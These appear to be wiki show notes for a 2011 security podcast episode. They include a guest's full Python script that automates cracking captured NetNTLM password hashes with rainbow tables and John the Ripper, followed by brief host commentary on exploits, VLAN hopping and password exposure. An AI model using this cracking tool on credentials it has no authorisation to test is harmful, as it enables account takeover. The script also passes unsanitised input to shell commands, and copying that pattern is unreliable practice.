Episode270

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security


Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 270 for Thursday December 15th, 2011.

  • Subscribe to our only non-computer security related show dedicated to Cigar Enthusiasts Stogie Geeks with Paul Asadoorian and Tim "BugBear" Mugherini. We are working on our top ten cigars released in 2011. We've been painstakingly smoking cigars, enjoyed with fresh coffee and single malt scotch in my nice warm workshop. Its a hard job but someone has to do it, and we're, ya know, toughing through it.

Episode Media

MP3

Guest Interview: Tim Medin

6:00 PM ET

Tim Medin is a senior security consultant for FishNet Security and specializes in penetration testing. He has held a variety of positions in technology fields including developer, network engineer, control systems engineer, robotic engineer, penetration tester, and McDonald's fry cook. He is active in the security community on the CommandLineKungFu.com podcast, Laudanum, his local defcon group, CCDC, and other areas.

Tim is on to discuss NBNS & automating hash cracking of hashes received from the attack.


Command Line Kung Fu Blog

Security Whole Blog

Tim on Twitter

fastnetntlm.py


#!/usr/bin/env python

####################################################################################
# Author:      Tim Medin
# Contact:     timmedin [@] securitywhole [d0t] com
# Name:        fastnetntlm.py
# Version:     0.1
# Description: An automated method of reading netntlm hashes and cracking them
####################################################################################


####################################################################################
# TODO:
#    Errors due to invalid paths are not output, stat the files to ensure they exist
####################################################################################

from sys import *
import os
import time
import subprocess
import fileinput
from optparse import OptionParser
from optparse import OptionGroup
from datetime import datetime
from sets import Set

usage = "usage: %prog [options] hashesfile"
parser = OptionParser(usage=usage, version="%prog 0.1")
#parser.add_option("-f", "--hashesfile", action="store", type="string", dest="hashesfile",  help="file containing the hashes")
parser.add_option("-a", "--alpha",      action="store", type="string", dest="rt_alpha",    help="path to halflmchall_alpha-numeric rainbow tables")
parser.add_option("-b", "--all",        action="store", type="string", dest="rt_allspace", help="path to halflmchall_all-space rainbow tables")
parser.add_option("-v", "--verbose",    action="store_true",           dest="verbose",     help="don't print status messages to stdout", default=False)

group = OptionGroup(parser, "Suplementary executable locations", "If your file locations differ from the default use these options")
group.add_option("-p", "--perlpath",    action="store", type="string", dest="perl",        help="path to perl (default is /usr/bin/perl)", default="/usr/bin/perl")
group.add_option("-j", "--johnnetntlm", action="store", type="string", dest="johnnetntlm", help="path to John the Ripper's netntlm.pl from Jumbo Pack (default is /usr/share/john/netntlm.pl)", default="/usr/share/john/netntlm.pl")
group.add_option("-r", "--rcracki",     action="store", type="string", dest="rcracki",     help="path to rcracki_mt (default is /usr/bin/rcracki_mt)", default="/usr/bin/rcracki_mt")
parser.add_option_group(group)

(options, args) = parser.parse_args()

# put the rainbbow tables into a list
rtables = []
if options.rt_alpha:
        rtables.append(options.rt_alpha)
if options.rt_allspace:
        rtables.append(options.rt_allspace)
if len(rtables) == 0:
        parser.error("No rainbow tables specified")

# ensure an input file is specified
if len(args) == 0:
        parser.error("No hashes file specified")
        OptionParser.print_usage()

# TODO: FIX THIS THE RIGHT WAY
print "Make sure you copy the charset.txt file from the directory rcracki_mt runs in"

# open hashes file and remove duplidates
fin = open(args[0],"r")
hashes = set([])
for hashrow in fin:
        hashes.add(hashrow)
fin.close()

# crack away baby
for line in hashes:
        if options.verbose: print "Processing " + hashrow

        # parse the file
        user = line.split(":")[0] 
        domain = line.split(":")[2] 
        lmhash = line.split(":")[3]
        lmhash_first = lmhash[0:16]

        if options.verbose: print str(datetime.now()) + ": Processing " + user + " with tables " + rtables[0]
        process = subprocess.Popen(options.rcracki + " -h " + lmhash_first + " " + rtables[0], shell=True, stdout=subprocess.PIPE)
        lastline = process.communicate()[0].splitlines()[-1]
        seed = lastline.split()[1]
        if options.verbose: print str(datetime.now()) + ": Processing " + user + " seed: " + seed

        if seed == "<notfound>" and len(rtables) == 2:
                if options.verbose: print str(datetime.now()) + ": Processing " + user + " with tables " + rtables[0]
                process = subprocess.Popen(options.rcracki + " -h " + lmhash_first + " " + rtables[1], shell=True, stdout=subprocess.PIPE)
                lastline = process.communicate()[0].splitlines()[-1]
                seed = lastline.split()[1]
                if options.verbose: print str(datetime.now()) + ": Processing " + user + " seed:  " + seed

        if seed != "<notfound>":
                singlehashfile = domain + "." + user + ".hash"
                fout = open(singlehashfile, "w")
                fout.write(line)
                fout.close()

                if options.verbose: print str(datetime.now()) + ": Bruteforcing the remainder of " + user + "'s password  " + seed
                process = subprocess.Popen(options.perl + " " + options.johnnetntlm + " --seed " + seed + " --file " + singlehashfile, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                out = process.communicate()
                process = subprocess.Popen(options.perl + " " + options.johnnetntlm + " --seed " + seed + " --file " + singlehashfile, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                out = process.communicate()

                # check the output. the first part looks for a new crack                
                passwd = None
                for line in out[0].splitlines():
                        if line.find("(" + user +")") > 0:
                                passwd = line.split()[0]

                # if the password was previously found use this to extract it from the output
                if not passwd:
                        for line in out[0].splitlines():
                                if line.find(user) > 0:
                                        passwd = line.split(":")[1]
                                        #pass =print domain + " " + user + " " + line.split()[0]

                print domain + " " + user + " " +  passwd
                os.remove(singlehashfile)

Paul's Stories

  1. Password Improvements Coming To Windows 8 - Why doesn't Windows have a good unified password storage that works with multiple browsers, applications, and services? Could this be the key to solving the password problem? Right now, users have to know to go download Keepass, and more people don't. Sure, if the password database is hacked, its a bad thing, however if an attacker is on your system they can get your passwords anyhow. I'm starting to thing that this technoliogy, if enabled by default and integrated into Windows, has the highest probability of making the largest impact on password security. Of course, it has to come with a filter to make sure users choose passwords of a minimum length. Then again, anyone who doesn't allow a user enter at least 12 character password should be shot without qustion.
  2. Reversing Industrial firmware for fun and backdoors I - I love to see articles on reverse engineering firmware, it makes me, well, excited. The part i LOVE about this post is that he searches Shodan to find these devices on the Internet, then downloads the firmware. So, you see SCADA industry, you don't even need the device in order to find bugs and make exploitable code or find backdoors in your systems. Turns out there are tons of backdoor accounts, and it turns out you can upload your own firmware. Same story we've been telling for years, nicely presented by Ruben Santamarta at the reversemode.com blog.
  3. Not 0wning That ColdFusion Server but Helping... - Useful tips on attack ColdFusion web server, which are still pretty popular.
  4. Splunk Remote Root Exploit - Ouch, but looks like you still need to brute-force a password. Point is though, make sure the free security tools you've installed inside your network do not contain vulnerabilities. If we all helped test the tools we used, the security world would be a safer place.
  5. A look back at 2011’s security landscape - I got a look back at 2011, a bunch of shit got pwn3d, companies had data breaches coming out of the ass, and client-side and web application software is total crap. My prediction for 2012 along the same lines? We're all Phucked.
  6. Ettercap updated after more than seven years. - Nice to see tools that haven't been updated in a while get updated. Ettercap is still a fantastic tool for attacking, I've seen it used in some pretty advanced attacks. Glad to see that someone has taken the healm on the project.
  7. PuTTY Stored Plaintext Passwords in Memory After Authentication - We see this a lot, and I wish applications would not do this, stop storing plain-text passwords in memory! However, if you are pen testing, dumping memory is fun, you should do it. Even better if the password is stored in the registry either as plain text or easily decipherable.
  8. DARPA Shredder Challenge - I think this is really cool: Today's troops often confiscate the remnants of destroyed documents in war zones, but reconstructing them is a daunting task. DARPA's Shredder Challenge called upon computer scientists, puzzle enthusiasts and anyone else who likes solving complex problems to compete for up to $50,000 by piecing together a series of shredded documents. Yea, thats right bitches, if you leave stuff behind that shredded, we will put it together and use it against you. My advice? Fire, lots of fire.
  9. Path of Least Resistance : FishNet Security - And, go Tim!
  10. VLAN Hacking |  InfoSec Institute – IT Training and Information Security Resources - Nice tutorial on VLAN hopping. Nothing really new, but we should be testing this on all our internal pen tests to see how the network reacts if they are relying on VLANS to segment the network. The nice part about jumping around at layer 2 is that firewalls, for the most part, are still a layer 3 thing.
  11. Prepping for 2012: 3 Tips When Speaking to the Board of Directors - I like this article, any information and tips we get for talking to management should be taken seriously. Broken down its keeping it simple, using pictures and numbers, and repeating yourself in an interesting way. Love it.
  12. Top 5 mobile phone security threats in 2012 - Uhm, yea, these are the same threats we've dealt with for a long time. Go figure. I still stand by my stance on mobile phones, attackers will go after them only when its more profitable and easier to attack mobile phones rather than Internet connected computers.
  13. VPN An Oft-Forgotten Attack Vector - VPNs are targets, penetration tests exposed them all the time. The thing is, its a client-side attack. So, make sure you allow your testers to go after the VPN with the gloves off. Throwing them an IP address and saying "test my VPN" does not work.
  14. Microsoft gets silent upgrade religion - Microsoft will silently upgrade the browser? No way, won't this break stuff? I'm shocked MS customers aren't more pissed off. There are so many applications that break when the browser is updated. My advice: don't buy apps like this. However, how do you know? Sure, you could ask them if an update will break it, and of course they are going to say "no". I think the problem is slimy software companies. Be damned with them.

Larry's Stories

  1. Splunk with Spunk - [Larry] - A couple of vulnerabilities in Splunk that allow, directory traversal, remote code execution, gathering of logs and user id creation and brute force - all in one handy tool. Figures, guess what I just in stalled the other day…This is potentially damaging if you are using this for log management in your org as this would be great for an attacker to gain access to and harvest for informatioon, and wipe…
  2. All up in your GPS [Larry] - That "recovered" US drone? Allegedly it was forced to land by overriding operator control with wirless gamming, forcing it into auto pilot. Auto pilot then said "return and land at these coordinates" which the Iraninans claim to have spoofed to get it to land where they wanted. they say it was damaged as the real landing zone and the fake one did not have the same height above sea level, this damaging the landing gear. I wonder why, if they could spoof the location (how did they know the location?) why could they not spoof an accurate altitude.
  3. Metasploit upodates and deaths - [Larry] - Moving forward, quite possibly, but making a whole lot of work for us going forward. The death of db_autopwn is upon us with new automation methods still in development (and maybe a bit light). Also the death of XMLRPC, which was allegedly very buggy. Some tools updated it, but not all (Armitage ok I think, nsploit not yet, and who knows about all of your custom tools.) Oh, and yes, my question about how to keep updating now that the project has moved to git? You should still do "svn update" as they wrote some custom software to pull from git and populate svn.
  4. Lazarus from the dead - [Larry] - An updated version of Ettercap. The first time in 7 years we have an update with some bug fixes, and Alor & Naga have passed the development torch to a new team.
  5. When you see this… - {Larry] - Sounds like a pentest to me.
  6. I want Carlos to do this story because it is about Putty - [Larry] - whoops. Passwords stored in cleartext in memory buferes during program execution after successful authentication…

Jack's Lonely Story